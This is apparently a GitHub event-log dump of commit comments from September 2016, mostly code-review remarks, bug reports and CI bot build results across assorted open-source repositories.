{"id":"4605895878","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19139037,"position":null,"line":null,"path":null,"commit_id":"ae5e042c1640b4b39d5148fb38a0664028931920","created_at":"2016-09-23T00:24:18Z","updated_at":"2016-09-23T00:24:18Z","body":"This completes https://github.com/balderdashy/sails/pull/3522"}},"created_at":"2016-09-23T00:24:18Z"}
{"id":"4605897791","type":"CommitCommentEvent","actor":{"login":"ismael-benitez"},"repo":{"name":"jorge07/alpine-php"},"payload":{"comment":{"id":19139045,"position":null,"line":null,"path":null,"commit_id":"d6dfb839be8e23e1431a597608e3197f364bf175","created_at":"2016-09-23T00:24:59Z","updated_at":"2016-09-23T00:24:59Z","body":"esta nueva configuración me devuelve este error:\r\n\r\n> [23-Sep-2016 00:10:24] ERROR: [/etc/php7/php-fpm.conf:19] value is NULL for a ZEND_INI_PARSER_ENTRY\r\n> [23-Sep-2016 00:10:24] ERROR: failed to load configuration file '/etc/php7/php-fpm.conf'\r\n> [23-Sep-2016 00:10:24] ERROR: FPM initialization failed\r\n"}},"created_at":"2016-09-23T00:24:59Z"}
{"id":"4605901821","type":"CommitCommentEvent","actor":{"login":"alexandermorgan"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19139054,"position":null,"line":null,"path":null,"commit_id":"2a49417c2f8f62b4dd3a1523a20ce1a15fba73d0","created_at":"2016-09-23T00:26:22Z","updated_at":"2016-09-23T00:26:22Z","body":"@musicus why is there nothing under the \"Installation\" section of this file?"}},"created_at":"2016-09-23T00:26:22Z"}
{"id":"4605907166","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19139069,"position":null,"line":null,"path":null,"commit_id":"2dc69f2d1f6c9a60e81eb8f48ce85365d91d82c0","created_at":"2016-09-23T00:28:13Z","updated_at":"2016-09-23T00:28:13Z","body":"если я сам указываю `responseType = 'arraybuffer'` при запросе, то в `raw` я ожидаю увидеть `arraybuffer`, а тут вообще `Array` возвращается."}},"created_at":"2016-09-23T00:28:13Z"}
{"id":"4605918824","type":"CommitCommentEvent","actor":{"login":"Pccnzb"},"repo":{"name":"Mooophy/Cpp-Primer"},"payload":{"comment":{"id":19139088,"position":null,"line":null,"path":null,"commit_id":"3b5ddad1f32a1a5c0bb4b2a2a2608f6dce535f8b","created_at":"2016-09-23T00:31:40Z","updated_at":"2016-09-23T00:31:40Z","body":"我已经使用**int** 作为函数返回类型。thx !"}},"created_at":"2016-09-23T00:31:40Z"}
{"id":"4605931428","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"nhosoi/origin-aggregated-logging"},"payload":{"comment":{"id":19139116,"position":23,"line":102,"path":"hack/testing/test-undefined.sh","commit_id":"67b9553fc0b423fe0ab5ee573ee7816d027ff218","created_at":"2016-09-23T00:36:09Z","updated_at":"2016-09-23T00:36:09Z","body":"keep the `-c kibana` in the command"}},"created_at":"2016-09-23T00:36:09Z"}
{"id":"4605934317","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19139124,"position":null,"line":null,"path":null,"commit_id":"29caa185a7e4aaa0d621a4f117f3e8f653261fda","created_at":"2016-09-23T00:37:18Z","updated_at":"2016-09-23T00:37:18Z","body":"This seems to have broxen my i3 install, by adding `user-session = xterm` to my lightdm config where I didn't have it before. Has something changed where I need to do more than set `services.xserver.windowManager.i3.enable = true` to make it work?"}},"created_at":"2016-09-23T00:37:18Z"}
{"id":"4605938397","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19139136,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T00:38:40Z","updated_at":"2016-09-23T00:38:40Z","body":"The time control that was specified in your test is not LTC"}},"created_at":"2016-09-23T00:38:40Z"}
{"id":"4605938536","type":"CommitCommentEvent","actor":{"login":"vadi2"},"repo":{"name":"Mudlet/Mudlet"},"payload":{"comment":{"id":19139137,"position":null,"line":null,"path":null,"commit_id":"aed349463eadf61b293133fe603bbd6b686c01a4","created_at":"2016-09-23T00:38:44Z","updated_at":"2016-09-23T00:38:44Z","body":"I stuffed up, didn't mean to commit it directly."}},"created_at":"2016-09-23T00:38:44Z"}
{"id":"4605940023","type":"CommitCommentEvent","actor":{"login":"VictorThibert"},"repo":{"name":"laurenceli/laurenceli.github.io"},"payload":{"comment":{"id":19139144,"position":null,"line":null,"path":null,"commit_id":"dc02bb947b5f7673b28e21e60d5d481cd5b02213","created_at":"2016-09-23T00:39:17Z","updated_at":"2016-09-23T00:39:17Z","body":"nice commit"}},"created_at":"2016-09-23T00:39:17Z"}
{"id":"4605942643","type":"CommitCommentEvent","actor":{"login":"laurenceli"},"repo":{"name":"laurenceli/laurenceli.github.io"},"payload":{"comment":{"id":19139156,"position":null,"line":null,"path":null,"commit_id":"dc02bb947b5f7673b28e21e60d5d481cd5b02213","created_at":"2016-09-23T00:40:18Z","updated_at":"2016-09-23T00:40:18Z","body":"# thanks bruh"}},"created_at":"2016-09-23T00:40:18Z"}
{"id":"4605950047","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"Coande/LandLeg_Java"},"payload":{"comment":{"id":19139177,"position":null,"line":null,"path":null,"commit_id":"a34b9c596d91fadffeee79c22a64c9f01d353183","created_at":"2016-09-23T00:43:08Z","updated_at":"2016-09-23T00:43:08Z","body":"天翼官网写着这种月底失效。我尝试去抓包过，这回电信学聪明了，抓不到信息了，ida反汇编可以使，但是不会用，我只好尝试反编译apk然后查出只修改了挑战算法。抓不到包来核对，我也不是很确定是不是这种算法"}},"created_at":"2016-09-23T00:43:08Z"}
{"id":"4605957754","type":"CommitCommentEvent","actor":{"login":"dominik-weber"},"repo":{"name":"luberda-molinet/FFImageLoading"},"payload":{"comment":{"id":19139198,"position":6,"line":44,"path":"source/FFImageLoading.Droid/Helpers/MainThreadDispatcher.cs","commit_id":"ce1442dc8d7c9a6376da2f73b9723d726642a9ac","created_at":"2016-09-23T00:45:47Z","updated_at":"2016-09-23T00:45:47Z","body":"You can actually shorten this using the new C# 6 null conditional operator:\r\n`action?.Invoke();`\r\n\r\nsee: https://msdn.microsoft.com/en-us/library/dn986595.aspx"}},"created_at":"2016-09-23T00:45:47Z"}
{"id":"4605958288","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139200,"position":38,"line":38,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:46:00Z","updated_at":"2016-09-23T00:46:00Z","body":"You're not supposed to use dots in plugin identifiers anymore. As for versions, it helps if it's in Maven format - allows for easy use with the `@Dependency` annotation (which I imagine would be used here)."}},"created_at":"2016-09-23T00:46:00Z"}
{"id":"4605960199","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139203,"position":46,"line":46,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:46:42Z","updated_at":"2016-09-23T00:46:42Z","body":"`Path`s are generally recommended over `File`s."}},"created_at":"2016-09-23T00:46:42Z"}
{"id":"4605965039","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139219,"position":76,"line":76,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:48:20Z","updated_at":"2016-09-23T00:48:20Z","body":"This leaves a trailing comma - consider Google's `Joiner` class."}},"created_at":"2016-09-23T00:48:20Z"}
{"id":"4605966154","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139222,"position":78,"line":78,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:48:47Z","updated_at":"2016-09-23T00:48:47Z","body":"Perhaps you might want to return the number of fonts as a query result?"}},"created_at":"2016-09-23T00:48:47Z"}
{"id":"4605968759","type":"CommitCommentEvent","actor":{"login":"johnfn"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":19139228,"position":9,"line":674,"path":"src/actions/actions.ts","commit_id":"deb55f02278863c306fc190eb0907a63ae6f9c40","created_at":"2016-09-23T00:49:47Z","updated_at":"2016-09-23T00:49:47Z","body":"I'd like knowledge like this to live on the ArrowKeys class rather than on this class. "}},"created_at":"2016-09-23T00:49:47Z"}
{"id":"4605969599","type":"CommitCommentEvent","actor":{"login":"uboznikov"},"repo":{"name":"GluuFederation/oxTrust"},"payload":{"comment":{"id":19139230,"position":null,"line":null,"path":null,"commit_id":"1b7fcc3a8b7ddf038f6303ef074b6c76e36e270e","created_at":"2016-09-23T00:50:06Z","updated_at":"2016-09-23T00:50:06Z","body":"Thanks @yurem "}},"created_at":"2016-09-23T00:50:06Z"}
{"id":"4605969708","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139231,"position":90,"line":90,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:50:08Z","updated_at":"2016-09-23T00:50:08Z","body":"When parsing command arguments, usually you'd make a custom `CommandElement` instead of parsing them in the executor."}},"created_at":"2016-09-23T00:50:08Z"}
{"id":"4605974468","type":"CommitCommentEvent","actor":{"login":"bradleyrichter"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19139240,"position":null,"line":null,"path":null,"commit_id":"9f7073c21162fe6ff1ffd1d0964bb8f613806638","created_at":"2016-09-23T00:51:49Z","updated_at":"2016-09-23T00:51:49Z","body":"If you don't restart, what happens?\r\n\r\nHow about a recommended restart using the alert bar?"}},"created_at":"2016-09-23T00:51:49Z"}
{"id":"4605978835","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139249,"position":129,"line":129,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:53:26Z","updated_at":"2016-09-23T00:53:26Z","body":"Why not just embed a default config in `/assets/gamecube762/texttoblock/` (or whatever the id might change to)? Then you can use the AssetManager to directly copy the file if it doesn't already exist."}},"created_at":"2016-09-23T00:53:26Z"}
{"id":"4605980780","type":"CommitCommentEvent","actor":{"login":"NGCxInCuBuS"},"repo":{"name":"NGCxInCuBuS/IDK"},"payload":{"comment":{"id":19139253,"position":null,"line":null,"path":null,"commit_id":"c72aa3773e641c651e2b538b868143d07aa8e4da","created_at":"2016-09-23T00:54:10Z","updated_at":"2016-09-23T00:54:10Z","body":"addwdad"}},"created_at":"2016-09-23T00:54:10Z"}
{"id":"4605986529","type":"CommitCommentEvent","actor":{"login":"ConnorRigby"},"repo":{"name":"FarmBot-Labs/laughing-octo-telegram"},"payload":{"comment":{"id":19139262,"position":51,"line":36,"path":"lib/mqtt/mqtt_supervisor.ex","commit_id":"bb810fe52fc0cdd1c1b78e128dc0f5c62d03b164","created_at":"2016-09-23T00:56:09Z","updated_at":"2016-09-23T00:56:09Z","body":"How to solve a library not being OTP. Will refactor this momentarily"}},"created_at":"2016-09-23T00:56:09Z"}
{"id":"4605988696","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":19139267,"position":null,"line":null,"path":null,"commit_id":"fc0e8db7a8defc735a6a2f5b9143297ab0ee819d","created_at":"2016-09-23T00:56:58Z","updated_at":"2016-09-23T00:56:58Z","body":"Hey as you seen I have a project pycraft. Mcpe python server. I need help would you like to join in?"}},"created_at":"2016-09-23T00:56:58Z"}
{"id":"4605989136","type":"CommitCommentEvent","actor":{"login":"cameronattard"},"repo":{"name":"containous/traefik"},"payload":{"comment":{"id":19139269,"position":null,"line":null,"path":null,"commit_id":"9f6484a328127189009d83dd2758115ccc4529c1","created_at":"2016-09-23T00:57:08Z","updated_at":"2016-09-23T00:57:08Z","body":"Is there a timeline for when this will be included into a release? This is a feature we'd love to use."}},"created_at":"2016-09-23T00:57:08Z"}
{"id":"4605989361","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139270,"position":67,"line":67,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T00:57:14Z","updated_at":"2016-09-23T00:57:14Z","body":"With services, usually the `Class<T>` that is provided is an interface, while the instance is one that implements it. So you'd probably have `FontManager` as an interface, and another class `FontManagerImpl` or something which implements it."}},"created_at":"2016-09-23T00:57:14Z"}
{"id":"4606001222","type":"CommitCommentEvent","actor":{"login":"pie-flavor"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19139486,"position":1,"line":1,"path":".gitignore","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T01:01:26Z","updated_at":"2016-09-23T01:01:26Z","body":"This doesn't actually ignore the project file - don't know if that's intended. [Sponge's](https://raw.githubusercontent.com/SpongePowered/SpongeAPI/master/.gitignore) is pretty good."}},"created_at":"2016-09-23T01:01:26Z"}
{"id":"4606001344","type":"CommitCommentEvent","actor":{"login":"rebornix"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":19139487,"position":9,"line":674,"path":"src/actions/actions.ts","commit_id":"deb55f02278863c306fc190eb0907a63ae6f9c40","created_at":"2016-09-23T01:01:28Z","updated_at":"2016-09-23T01:01:28Z","body":"Agree, I did have thought about that solution as well. Let me do it.\n\nGrant Mathews <notifications@github.com>于2016年9月22日周四 下午5:49写道：\n\n> I'd like knowledge like this to live on the ArrowKeys class rather than on\n> this class.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/VSCodeVim/Vim/commit/deb55f02278863c306fc190eb0907a63ae6f9c40#commitcomment-19139228>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA1heNLFvihNxNOXELCVHDRVGAkxlOjAks5qsyIsgaJpZM4KEgaD>\n> .\n>\n"}},"created_at":"2016-09-23T01:01:28Z"}
{"id":"4606003228","type":"CommitCommentEvent","actor":{"login":"jamestalmage"},"repo":{"name":"jamestalmage/cli-table2"},"payload":{"comment":{"id":19139490,"position":39,"line":158,"path":"src/utils.js","commit_id":"6f53cbfb724af921e5ac9b1b763addd86dc6e34d","created_at":"2016-09-23T01:02:08Z","updated_at":"2016-09-23T01:02:08Z","body":"Sure.\r\n\r\nNot sure why `truncateChar` has a parameter for the `truncate` method (see ⬇️). I don't remember if that is exposed as an option in the public API or not. Even if it is, I really doubt it's being used (though this thing has gotten pretty popular, so probably better to exercise caution).\r\n\r\n "}},"created_at":"2016-09-23T01:02:08Z"}
{"id":"4606007642","type":"CommitCommentEvent","actor":{"login":"MoonSlime"},"repo":{"name":"MoonSlime/Unity"},"payload":{"comment":{"id":19139501,"position":null,"line":null,"path":null,"commit_id":"355dc9f97b9f4f8e8a3c4fee880f3fca0e342f68","created_at":"2016-09-23T01:03:40Z","updated_at":"2016-09-23T01:03:40Z","body":"리듬게임(리듬은 없지만...)"}},"created_at":"2016-09-23T01:03:40Z"}
{"id":"4606007707","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19139502,"position":null,"line":null,"path":null,"commit_id":"c2191b1a2f9db0080bbc8bd3536bed0c70811d37","created_at":"2016-09-23T01:03:41Z","updated_at":"2016-09-23T01:03:41Z","body":"Actualizo el capitulo a la versión commit https://github.com/DjangoGirls/tutorial/commit/c4471e79f93804c7b8e37b64d7634a89766c0a81"}},"created_at":"2016-09-23T01:03:41Z"}
{"id":"4606018126","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19139526,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-23T01:07:13Z","updated_at":"2016-09-23T01:07:13Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1771 of 1771 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T01:07:13Z"}
{"id":"4606022232","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19139533,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-23T01:08:11Z","updated_at":"2016-09-23T01:08:11Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T01:08:11Z"}
{"id":"4606023538","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139538,"position":null,"line":null,"path":null,"commit_id":"27af9ac3efcea0fd58f6dcc4325eef3ff288783b","created_at":"2016-09-23T01:08:39Z","updated_at":"2016-09-23T01:08:39Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2300 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-27af9ac3efcea0fd58f6dcc4325eef3ff288783b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-27af9ac3efcea0fd58f6dcc4325eef3ff288783b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.18%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T01:08:39Z"}
{"id":"4606024670","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139541,"position":null,"line":null,"path":null,"commit_id":"89a2214f5e9b3170f741fc57fb6c3d24f1008940","created_at":"2016-09-23T01:09:08Z","updated_at":"2016-09-23T01:09:08Z","body":"develop (Unknown) - Win64-Windows-7-VisualStudio-12: OK (2406 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T01:09:08Z"}
{"id":"4606029675","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":19139550,"position":null,"line":null,"path":null,"commit_id":"e786a2b8872caf09835ca678ab0a57dfbe74b657","created_at":"2016-09-23T01:11:04Z","updated_at":"2016-09-23T01:11:04Z","body":"penambahan catatan mungkin keterangan kenapa KK tersebut ada atau di hilangkan, cukup > \r\n1. pendatang (satu keluarga datang)\r\n2. pecah_kk,  (terjadinya perceraian/anggota keluarga membuat kk baru)\r\n3 kk_baru, (artinya penduduk yang baru berumah tangga)\r\n4. kepala_kk_pindah (karna kepala kk pindah, biasanya di disdukcapil no kk jadi baru)\r\n5. kepala_kk_mati (kalau kepala kk mati di disdukcapil no kk jadi baru)\r\n6. kk_pindah (satu keluarga pindah)"}},"created_at":"2016-09-23T01:11:04Z"}
{"id":"4606039830","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139580,"position":null,"line":null,"path":null,"commit_id":"27af9ac3efcea0fd58f6dcc4325eef3ff288783b","created_at":"2016-09-23T01:14:56Z","updated_at":"2016-09-23T01:14:56Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-27af9ac3efcea0fd58f6dcc4325eef3ff288783b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-23T01:14:56Z"}
{"id":"4606051263","type":"CommitCommentEvent","actor":{"login":"zhaozhuoboy"},"repo":{"name":"newming/duopingshidai"},"payload":{"comment":{"id":19139612,"position":null,"line":null,"path":null,"commit_id":"2a12daa567fa5cafffbbad28e51870a1e29e854f","created_at":"2016-09-23T01:19:15Z","updated_at":"2016-09-23T01:19:15Z","body":"完事了？"}},"created_at":"2016-09-23T01:19:15Z"}
{"id":"4606052849","type":"CommitCommentEvent","actor":{"login":"tornadomeet"},"repo":{"name":"tornadomeet/ResNet"},"payload":{"comment":{"id":19139648,"position":51,"line":83,"path":"train_resnet.py","commit_id":"2042cc9fccab0bd488e93ed1311328b1de8eea48","created_at":"2016-09-23T01:19:50Z","updated_at":"2016-09-23T01:19:50Z","body":"@mli  oh, sorry, i just saw this commit.! \r\n i'll do it using **kwargs these days.\r\nand i'll give pull request when change the default behavior code in the future."}},"created_at":"2016-09-23T01:19:50Z"}
{"id":"4606054378","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19139651,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-23T01:20:23Z","updated_at":"2016-09-23T01:20:23Z","body":"Awesome, thanks :)  I missed it."}},"created_at":"2016-09-23T01:20:23Z"}
{"id":"4606056917","type":"CommitCommentEvent","actor":{"login":"InternetUnexplorer"},"repo":{"name":"InternetUnexplorer/ToasterPush"},"payload":{"comment":{"id":19139659,"position":null,"line":null,"path":null,"commit_id":"9eb36d59b5a93015262898b06b18fb91daf6b7aa","created_at":"2016-09-23T01:21:19Z","updated_at":"2016-09-23T01:21:19Z","body":"I feel pretty stupid about this."}},"created_at":"2016-09-23T01:21:19Z"}
{"id":"4606057095","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139660,"position":null,"line":null,"path":null,"commit_id":"26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee","created_at":"2016-09-23T01:21:23Z","updated_at":"2016-09-23T01:21:23Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T01:21:23Z"}
{"id":"4606057681","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19139662,"position":5,"line":8,"path":"db.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-23T01:21:35Z","updated_at":"2016-09-23T01:21:35Z","body":"so here you're returning a connection object that then the receiver has to manage alone -- this is not great, because now it's the receiver's burden to commit(), close(), etc. This is exactly the kind of abstraction that db.py is meant to handle"}},"created_at":"2016-09-23T01:21:35Z"}
{"id":"4606058500","type":"CommitCommentEvent","actor":{"login":"mgold"},"repo":{"name":"elm-lang/elm-compiler"},"payload":{"comment":{"id":19139664,"position":null,"line":null,"path":null,"commit_id":"dbc1665a74f8f9a923fef21b462b85355068bf0b","created_at":"2016-09-23T01:21:53Z","updated_at":"2016-09-23T01:21:53Z","body":"🎉 👍 👏 "}},"created_at":"2016-09-23T01:21:53Z"}
{"id":"4606058712","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19139666,"position":9,"line":12,"path":"db.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-23T01:21:59Z","updated_at":"2016-09-23T01:21:59Z","body":"Basically what you're doing here"}},"created_at":"2016-09-23T01:21:59Z"}
{"id":"4606058818","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19139667,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-23T01:22:01Z","updated_at":"2016-09-23T01:22:01Z","body":"It's possible that shuffle has something to do with it. Here's a comparison of all the estimator/bin combinations with 0 and 1 shuffle.\r\n\r\n<img width=\"835\" alt=\"screen shot 2016-09-22 at 8 56 26 pm\" src=\"https://cloud.githubusercontent.com/assets/116655/18770944/81f6dbb2-8108-11e6-8998-8e341b886cbe.png\">\r\n<img width=\"832\" alt=\"screen shot 2016-09-22 at 8 56 44 pm\" src=\"https://cloud.githubusercontent.com/assets/116655/18770967/ccdd3b4e-8108-11e6-948a-1ae49dbda140.png\">\r\n<img width=\"835\" alt=\"screen shot 2016-09-22 at 8 56 56 pm\" src=\"https://cloud.githubusercontent.com/assets/116655/18771005/3c12b548-8109-11e6-9576-5271d3a4bcc7.png\">\r\n<img width=\"838\" alt=\"screen shot 2016-09-22 at 8 57 27 pm\" src=\"https://cloud.githubusercontent.com/assets/116655/18771143/7683d2ce-810a-11e6-9b0d-70a22bf30590.png\">\r\n<img width=\"832\" alt=\"screen shot 2016-09-22 at 8 57 53 pm\" src=\"https://cloud.githubusercontent.com/assets/116655/18770943/81dc315e-8108-11e6-95ea-017ede10f394.png\">\r\n\r\n\r\n\r\nShould I open up an issue?"}},"created_at":"2016-09-23T01:22:01Z"}
{"id":"4606064470","type":"CommitCommentEvent","actor":{"login":"jmr0"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19139679,"position":26,"line":35,"path":"app.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-23T01:24:12Z","updated_at":"2016-09-23T01:24:12Z","body":"I used to give people an interview problem where the answer was a query pretty much identical to this one, save for the names of the tables and columns obviously. Most people couldn't do it."}},"created_at":"2016-09-23T01:24:12Z"}
